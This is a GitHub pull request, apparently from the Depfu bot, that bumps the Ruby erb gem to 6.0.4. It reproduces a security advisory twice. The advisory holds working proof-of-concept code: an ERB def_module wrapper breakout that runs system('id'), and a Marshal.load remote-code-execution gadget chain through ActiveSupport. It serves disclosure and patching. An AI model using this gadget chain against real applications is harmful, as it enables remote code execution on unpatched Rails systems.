Skip to content

🚨 [security] Update erb 6.0.1 → 6.0.4 (patch)#529

Open
depfu[bot] wants to merge 1 commit intomainfrom
depfu/update/erb-6.0.4
Open

🚨 [security] Update erb 6.0.1 → 6.0.4 (patch)#529
depfu[bot] wants to merge 1 commit intomainfrom
depfu/update/erb-6.0.4

Conversation

@depfu
Copy link
Copy Markdown
Contributor

@depfu depfu Bot commented Apr 24, 2026

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ erb (indirect, 6.0.1 → 6.0.4) · Repo · Changelog

Security Advisories 🚨

🚨 ERB has an @_init deserialization guard bypass via def_module / def_method / def_class

Summary

Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an @_init instance variable guard in ERB#result and ERB#run to prevent code execution when an ERB object is reconstructed via Marshal.load (deserialization). However, three other public methods that also evaluate @src via eval() were not given the same guard:

  • ERB#def_method
  • ERB#def_module
  • ERB#def_class

An attacker who can trigger Marshal.load on untrusted data in a Ruby application that has erb loaded can use ERB#def_module (zero-arg, default parameters) as a code execution sink, bypassing the @_init protection entirely.

Details

The @_init Guard

In ERB#initialize, the guard is set:

# erb.rb line 838
@_init = self.class.singleton_class

In ERB#result and ERB#run, the guard is checked before eval(@src):

# erb.rb line 1008-1012
def result(b=new_toplevel)
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  eval(@src, b, (@filename || '(erb)'), @lineno)
end

When an ERB object is reconstructed via Marshal.load, @_init is either nil (not set during marshal reconstruction) or an attacker-controlled value. Since ERB.singleton_class cannot be marshaled, the attacker cannot set @_init to the correct value, and result/run correctly refuse to execute.

The Bypass

ERB#def_method, ERB#def_module, and ERB#def_class all reach eval(@src) without checking @_init:

# erb.rb line 1088-1093
def def_method(mod, methodname, fname='(ERB)')
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)      # <-- no @_init check
  end
end

# erb.rb line 1113-1117

def def_module(methodname='erb')       # <-- zero-arg call possible

mod = Module.new

def_method(mod, methodname, @filename || '(ERB)')

mod

end


# erb.rb line 1170-1174

def def_class(superklass=Object, methodname='result')  # <-- zero-arg call possible

cls = Class.new(superklass)

def_method(cls, methodname, @filename || '(ERB)')

cls

end

def_module and def_class accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.

Method wrapper breakout

def_method wraps @src in a method definition: "def erb\n" + @src + "\nend\n". Code inside a method body only executes when the method is called, not when it's defined. However, by setting @src to begin with end\n, the attacker closes the method definition early. Code after the first end executes immediately at module_eval time:

# Attacker sets @src = "end\nsystem('id')\ndef x"
# After def_method transformation, module_eval receives:
#
#   def erb
#   end
#   system('id')    <- executes at eval time
#   def x
#   end

Proof of Concept

Minimal (ERB only)

require 'erb'

erb = ERB.allocate

erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")

erb.instance_variable_set(:@lineno, 0)


# ERB#result correctly blocks this:

begin

erb.result

rescue ArgumentError => e

puts "result: #{e.message} (blocked by @_init -- correct)"

end


# ERB#def_module does NOT block this -- executes system('id'):

erb.def_module

# Output: uid=0(root) gid=0(root) groups=0(root)

Marshal deserialization (ERB + ActiveSupport)

When combined with ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy as a method dispatch gadget, this achieves RCE via Marshal.load:

require 'active_support'
require 'active_support/deprecation'
require 'active_support/deprecation/proxy_wrappers'
require 'erb'

# --- Build payload (replace proxy class for marshaling) ---

real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy

ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)

class ActiveSupport::Deprecation

class DeprecatedInstanceVariableProxy

def initialize(h)

h.each { |k, v| instance_variable_set(k, v) }

end

end

end


erb = ERB.allocate

erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")

erb.instance_variable_set(:@lineno, 0)

erb.instance_variable_set(:@filename, nil)


proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({

:@instance => erb,

:@method => :def_module,

:@var => "@x",

:@deprecator => Kernel

})


marshaled = Marshal.dump({proxy => 0})


# --- Restore real class and trigger ---

ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)

ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)


# This triggers RCE:

Marshal.load(marshaled)

# Output: uid=0(root) gid=0(root) groups=0(root)

Chain:

  1. Marshal.load reconstructs a Hash with a DeprecatedInstanceVariableProxy as key
  2. Hash key insertion calls .hash on the proxy
  3. .hash is undefined -> method_missing(:hash) -> dispatches to ERB#def_module
  4. def_module -> def_method -> module_eval(eval(src)) -> breakout -> system('id')

Verified on: Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1

Impact

Scope

Any Ruby application that calls Marshal.load on untrusted data AND has both erb and activesupport loaded is vulnerable to arbitrary code execution. This includes:

  • Ruby on Rails applications that import untrusted serialized data -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
  • Ruby tools that import untrusted serialized data -- any tool using Marshal.load for caching, data import, or IPC
  • Legacy Rails apps (pre-7.0) that still use Marshal for cookie session serialization

Severity justification

The @_init guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The def_module bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.

This bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.

Details

Gadget chain history

Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:

Year Chain Mitigated in
2018 Gem::Requirement (Luke Jahnke) RubyGems 3.0
2021 UDG -- TarReader+WriteAdapter (vakzz) RubyGems 3.1
2022 Gem::Specification._load (vakzz) RubyGems 3.6
2024 UncaughtThrowError (Luke Jahnke) Ruby 3.4 patches
2024 Gem::Source::Git#rev_parse RubyGems 3.6
2026 ERB#def_module @_init bypass ERB 6.0.4

Patches

The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.

  • ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4
Details

Add the @_init check to def_method. Since def_module and def_class both delegate to def_method, this single change covers all three bypass paths:

def def_method(mod, methodname, fname='(ERB)')
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)
  end
end

🚨 ERB has an @_init deserialization guard bypass via def_module / def_method / def_class

Summary

Ruby 2.7.0 (before ERB 2.2.0 was published on rubygems.org) introduced an @_init instance variable guard in ERB#result and ERB#run to prevent code execution when an ERB object is reconstructed via Marshal.load (deserialization). However, three other public methods that also evaluate @src via eval() were not given the same guard:

  • ERB#def_method
  • ERB#def_module
  • ERB#def_class

An attacker who can trigger Marshal.load on untrusted data in a Ruby application that has erb loaded can use ERB#def_module (zero-arg, default parameters) as a code execution sink, bypassing the @_init protection entirely.

Details

The @_init Guard

In ERB#initialize, the guard is set:

# erb.rb line 838
@_init = self.class.singleton_class

In ERB#result and ERB#run, the guard is checked before eval(@src):

# erb.rb line 1008-1012
def result(b=new_toplevel)
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  eval(@src, b, (@filename || '(erb)'), @lineno)
end

When an ERB object is reconstructed via Marshal.load, @_init is either nil (not set during marshal reconstruction) or an attacker-controlled value. Since ERB.singleton_class cannot be marshaled, the attacker cannot set @_init to the correct value, and result/run correctly refuse to execute.

The Bypass

ERB#def_method, ERB#def_module, and ERB#def_class all reach eval(@src) without checking @_init:

# erb.rb line 1088-1093
def def_method(mod, methodname, fname='(ERB)')
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)      # <-- no @_init check
  end
end

# erb.rb line 1113-1117

def def_module(methodname='erb')       # <-- zero-arg call possible

mod = Module.new

def_method(mod, methodname, @filename || '(ERB)')

mod

end


# erb.rb line 1170-1174

def def_class(superklass=Object, methodname='result')  # <-- zero-arg call possible

cls = Class.new(superklass)

def_method(cls, methodname, @filename || '(ERB)')

cls

end

def_module and def_class accept zero arguments (all parameters have defaults), making them callable through deserialization gadget chains that can only invoke zero-arg methods.

Method wrapper breakout

def_method wraps @src in a method definition: "def erb\n" + @src + "\nend\n". Code inside a method body only executes when the method is called, not when it's defined. However, by setting @src to begin with end\n, the attacker closes the method definition early. Code after the first end executes immediately at module_eval time:

# Attacker sets @src = "end\nsystem('id')\ndef x"
# After def_method transformation, module_eval receives:
#
#   def erb
#   end
#   system('id')    <- executes at eval time
#   def x
#   end

Proof of Concept

Minimal (ERB only)

require 'erb'

erb = ERB.allocate

erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")

erb.instance_variable_set(:@lineno, 0)


# ERB#result correctly blocks this:

begin

erb.result

rescue ArgumentError => e

puts "result: #{e.message} (blocked by @_init -- correct)"

end


# ERB#def_module does NOT block this -- executes system('id'):

erb.def_module

# Output: uid=0(root) gid=0(root) groups=0(root)

Marshal deserialization (ERB + ActiveSupport)

When combined with ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy as a method dispatch gadget, this achieves RCE via Marshal.load:

require 'active_support'
require 'active_support/deprecation'
require 'active_support/deprecation/proxy_wrappers'
require 'erb'

# --- Build payload (replace proxy class for marshaling) ---

real_class = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy

ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)

class ActiveSupport::Deprecation

class DeprecatedInstanceVariableProxy

def initialize(h)

h.each { |k, v| instance_variable_set(k, v) }

end

end

end


erb = ERB.allocate

erb.instance_variable_set(:@src, "end\nsystem('id')\ndef x")

erb.instance_variable_set(:@lineno, 0)

erb.instance_variable_set(:@filename, nil)


proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new({

:@instance => erb,

:@method => :def_module,

:@var => "@x",

:@deprecator => Kernel

})


marshaled = Marshal.dump({proxy => 0})


# --- Restore real class and trigger ---

ActiveSupport::Deprecation.send(:remove_const, :DeprecatedInstanceVariableProxy)

ActiveSupport::Deprecation.const_set(:DeprecatedInstanceVariableProxy, real_class)


# This triggers RCE:

Marshal.load(marshaled)

# Output: uid=0(root) gid=0(root) groups=0(root)

Chain:

  1. Marshal.load reconstructs a Hash with a DeprecatedInstanceVariableProxy as key
  2. Hash key insertion calls .hash on the proxy
  3. .hash is undefined -> method_missing(:hash) -> dispatches to ERB#def_module
  4. def_module -> def_method -> module_eval(eval(src)) -> breakout -> system('id')

Verified on: Ruby 3.3.8 / RubyGems 3.6.7 / ActiveSupport 7.2.3 / ERB 6.0.1

Impact

Scope

Any Ruby application that calls Marshal.load on untrusted data AND has both erb and activesupport loaded is vulnerable to arbitrary code execution. This includes:

  • Ruby on Rails applications that import untrusted serialized data -- any Rails app (every Rails app loads both ActiveSupport and ERB) using Marshal.load for caching, data import, or IPC
  • Ruby tools that import untrusted serialized data -- any tool using Marshal.load for caching, data import, or IPC
  • Legacy Rails apps (pre-7.0) that still use Marshal for cookie session serialization

Severity justification

The @_init guard was the recognized last line of defense against ERB being used as a deserialization gadget. Prior gadget chain research -- including Luke Jahnke's November 2024 Ruby 3.4 chain (nastystereo.com) and vakzz's 2021 Universal Deserialization Gadget -- pursued entirely different approaches (Gem::SpecFetcher, UncaughtThrowError, TarReader+WriteAdapter) without exploring the ERB def_method/def_module path. The def_module bypass is simpler and more direct than all previous chains, and was not addressed by the subsequent patches to Ruby 3.4 or RubyGems 3.6.

This bypass renders the @_init mitigation ineffective across all ERB versions from 2.2.0 through 6.0.3 (latest as of April 2026). Combined with the DeprecatedInstanceVariableProxy gadget (present in all ActiveSupport versions through 7.2.3), this constitutes a universal RCE gadget chain for Ruby 3.2+ applications using Rails.

Details

Gadget chain history

Six generations of Ruby Marshal gadget chains have been discovered (2018-2026). Each bypassed the previous round of mitigations:

Year Chain Mitigated in
2018 Gem::Requirement (Luke Jahnke) RubyGems 3.0
2021 UDG -- TarReader+WriteAdapter (vakzz) RubyGems 3.1
2022 Gem::Specification._load (vakzz) RubyGems 3.6
2024 UncaughtThrowError (Luke Jahnke) Ruby 3.4 patches
2024 Gem::Source::Git#rev_parse RubyGems 3.6
2026 ERB#def_module @_init bypass ERB 6.0.4

Patches

The problem has been patched at the following ERB versions. Please upgrade your erb.gem to any one of them.

  • ERB 4.0.3.1, 4.0.4.1, 6.0.1.1, and 6.0.4
Details

Add the @_init check to def_method. Since def_module and def_class both delegate to def_method, this single change covers all three bypass paths:

def def_method(mod, methodname, fname='(ERB)')
  unless @_init.equal?(self.class.singleton_class)
    raise ArgumentError, "not initialized"
  end
  src = self.src.sub(/^(?!#|$)/) {"def #{methodname}\n"} << "\nend\n"
  mod.module_eval do
    eval(src, binding, fname, -1)
  end
end
Release Notes

6.0.4

Full Changelog: v6.0.3...v6.0.4

6.0.3

What's Changed

  • Exclude dependabot updates from release note by @hsbt in #101
  • Fix typo: rename BDSL to BSDL by @djkazunoko in #103
  • Freeze src in initialize by @jhawthorn in #105
  • Use tag instead of branch with lewagon/wait-on-check-action by @hsbt in #107
  • fix: exclude some files from published gem by @G-Rath in #108

New Contributors

Full Changelog: v6.0.1...v6.0.3

6.0.2

What's Changed

New Contributors

Full Changelog: v6.0.1...v6.0.2

6.0.1.1

Full Changelog: v6.0.1...v6.0.1.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 19 commits:

Depfu Status

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands
@​depfu rebase
Rebases against your default branch and redoes this update
@​depfu recreate
Recreates this PR, overwriting any edits that you've made to it
@​depfu merge
Merges this PR once your tests are passing and conflicts are resolved
@​depfu cancel merge
Cancels automatic merging of this PR
@​depfu close
Closes this PR and deletes the branch
@​depfu reopen
Restores the branch and reopens this PR (if it's closed)
@​depfu pause
Ignores all future updates for this dependency and closes this PR
@​depfu pause [minor|major]
Ignores all future minor/major updates for this dependency and closes this PR
@​depfu resume
Future versions of this dependency will create PRs again (leaves this PR as is)

@depfu depfu Bot added the depfu label Apr 24, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

No one assigned

Labels

depfu

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

0 participants